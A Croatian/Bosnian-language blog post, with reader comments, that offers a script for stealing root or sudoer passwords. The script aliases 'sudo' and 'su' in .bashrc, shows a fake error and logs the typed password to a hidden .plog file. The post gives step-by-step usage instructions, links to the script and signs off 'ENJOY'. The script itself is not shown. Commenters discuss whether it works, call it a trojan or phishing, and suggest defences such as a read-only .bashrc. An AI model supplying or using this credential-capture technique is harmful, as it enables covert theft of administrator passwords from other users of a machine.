Nabavite ROOT lozinku

Naišao sam na skriptu koja mijenja .bashrc stvarajući pseudonim za "sudo" i "su". ne prije nego što ste napravili sigurnosnu kopiju datoteke da biste je kasnije vratili.

Ono što čini je da šalje poruku o grešci kada koristi "sudo" ili "su" i hvata lozinku u zapisnik koji se zove ".plog" koji je kod kuće.

Kako koristiti

  1. Spremite skriptu
  2. Dajte mu dozvole za izvršenje.
  3. Pokrenite ga u terminalu
  4. Zatvorite terminal
  5. Čekaj.
  6. Zatim provjerite .plog datoteku. I mora postojati lozinka root-a ili nekog korisnika koji je u Suderima.

http://paste.desdelinux.net/4691

UŽIVAJTE.


Ostavite komentar

Vaša e-mail adresa neće biti objavljena. Obavezna polja su označena sa *

*

*

  1. Za podatke odgovoran: Miguel Ángel Gatón
  2. Svrha podataka: Kontrola neželjene pošte, upravljanje komentarima.
  3. Legitimacija: Vaš pristanak
  4. Komunikacija podataka: Podaci se neće dostavljati trećim stranama, osim po zakonskoj obavezi.
  5. Pohrana podataka: Baza podataka koju hostuje Occentus Networks (EU)
  6. Prava: U bilo kojem trenutku možete ograničiti, oporaviti i izbrisati svoje podatke.

  1.   v3on rekao je

    za ove momke je da fizičku sigurnost našeg tima ne treba zanemariti

    1.    truko22 rekao je

      Tačno, ako se računalo posudi na trenutak, morate provjeriti pseudonime 😀

  2.   Lolo rekao je

    Nevino pitanje:

    Kako skripta mijenja .bashrc nesebičnog sudoer korisnika?

  3.   Blaire pascal rekao je

    Oo, stvarno mi se sviđa. Testiranje.

  4.   pacoeloyo rekao je

    Dakle, sigurnost i šifriranje koje koristimo u gnu / linux su bezvrijedni? Mislim da to nije slučaj, onaj ko ovo pokuša neka komentariše rezultate. Otkako koristim ovaj sistem, pročitao sam da su razine šifriranja u Linuxu vrlo visoke, lozinke se šifriraju pomoću jednosmjernih algoritama za kriptografsko smanjenje, a sada se ispostavlja da se jednostavnom skriptom ta enkripcija preskače. Žao mi je, ali ne vjerujem u to.

    1.    @Jlcmux rekao je

      Ako uspije, pogledajte. Ono što se događa je da skripta stvori alias u .bashrc sa sudo i su. I kada upišete su i / ili sudo. Prvo pročita pseudonim. ne naredba kao takva. pa kad unesete lozinku, on je stavlja u normalnu tekstualnu datoteku. a zatim briše alias i omogućava vam upotrebu sudo-a ili vašeg zajedničkog i trenutnog. Mislim, to je poput pishinga. Nije da zaobilazi šifriranje. to je lažna prijava.

      1.    pacoeloyo rekao je

        Ok, ako razumijem, već sam se iznenadio preskočivši tu zaštitu na torreru .. Hvala što ste to razjasnili.

        1.    kike rekao je

          Svakako, ali najteža stvar ostaje, natjerati skriptu da se uvuče u žrtvin računar, pokrene i zatim daljinski prikupi datoteku ili je pošalje na e-poštu. Tamo će svaki morati upotrijebiti maštu!

    2.    ikada rekao je

      Mislim da ste puno pretjerali s pacoeloyom. Ovo je jednostavan trojanski virus koji od korisnika zahtijeva da zaobiđe razne sigurnosne mjere i lokalno prisustvo napadača. To postoji u bilo kojem OS-u.
      Što se tiče skripte ... ako se ne varam, većina trenutnih SUDO-a provjerava autentičnost korisničkom lozinkom, a ne root lozinkom. Dakle, lozinka koja bi se dobila je korisnička (prisutna u Suderima).
      Saludos

      1.    @Jlcmux rekao je

        je sa sudo ili su. Također, ako korisnik može koristiti sudo, to je zato što je u sudoerima i ima iste privilegije kao root .. ili ne?

        1.    ikada rekao je

          ne uvijek, to ovisi o konfiguraciji sudoers-a. U svakom slučaju, najčešće je da imate puni pristup.
          Poanta je u tome što se akcije izvršene pomoću sudoa obično evidentiraju

      2.    diazepam rekao je

        jednostavno pozivanje "su" daje vam pristup osnovnom računu.

  5.   ps rekao je

    Ovo je vrlo opasno ako koristite dobre lozinke u zajedničkim učionicama ili u radionicama. Oni to mogu igrati za vas. Pa, mogli su to igrati ...

    Nije korisno otkrivati ​​lozinke neznanca, ali mislim da je dovoljno poznanika.

    I zapamtite, većina duplicira svoje lozinke ili koristi uobičajene obrasce. Nikad ih ne podcjenjuj. Ako ste jako kopile, naravno ...

  6.   Germaine rekao je

    Pa, ne petljam se ... Nemam što skrivati, čak ni završna ispitna pitanja ... a ako trebam lozinku, pitam je ... i imam svoje datoteke na vanjskom tvrdom disku ... sa sigurnosnom kopijom na laptopu koja ostaje uključena Kuća.
    Morate tražiti jednostavnost i praktičnost, danas sam živ sutra, ne znam ... Danas živim, ostali su prekovremeni.

  7.   ferchmetal rekao je

    Imaću to na umu, hvala.

  8.   elynx rekao je

    Zanimljivo!

  9.   Lolo rekao je

    Kako se ova skripta kopira u .bashrc korisnika sudoer-a?

    Ako imate račun na računaru, ne možete ući u dom drugog korisnika ako nemate dozvolu i još uvijek sumnjam da možete izmijeniti žrtvin .bashrc.

    Čisto sumnjam da će to uspjeti ako korisnik sudoer nije krajnje neoprezan.

  10.   lex aleksandre rekao je

    Moramo biti vrlo oprezni s ovim vremenom!

  11.   Marcos rekao je

    Jedno pitanje, ako nemam root lozinku, kako mogu dati odobrenje za izvršavanje datoteke? Ili normalan korisnik radi?

    1.    @Jlcmux rekao je

      Jasno. Odobrenja za izvršavanje nisu isključiva za root.

      1.    Alberto Aru rekao je

        POMOĆ!
        nakon što sam probao, izbrisao sam .sudo_sd i ne mogu pronaći ništa u googleu (ili drugim pretraživačima)

        1.    Alberto Aru rekao je

          Izbrisao sam .plog i automatski je izbrisan .sudo_sd i ne mogu se prijaviti kao root

          1.    Alberto Aru rekao je

            POPRAVLJENO KOMENTIRANJEM NESMJERA

  12.   Card rekao je

    Ako ovo uspije na MAC-u, idem trolati Apple trgovinu ... hej! ali samo malo, ne u terorističkom planu 😉

  13.   Atheyus rekao je

    Zanimljiv ulazak

    Sumnja

    A ako koristim gksu ili ekvivalent u kde

    Takođe snima lozinku

    Saludos

  14.   život kacige rekao je

    Izvršenje ove skripte može se izbjeći davanjem dozvole samo za čitanje .bashrc

  15.   Blazek rekao je

    Testirano, djeluje, aunk ima svoja ograničenja. U Linuxu uvijek naučite nove stvari.

  16.   Alberto Aru rekao je

    Kako mogu vratiti promjene koje su jednom napravljene? Izbrisao sam .plog i neće mi dopustiti da koristim sudo:
    bash: /home/alberto/.sudo_sd: Datoteka ili direktorij ne postoji

    1.    Alberto Aru rekao je

      POPRAVLJENO KOMENTIRANJEM NESMJERA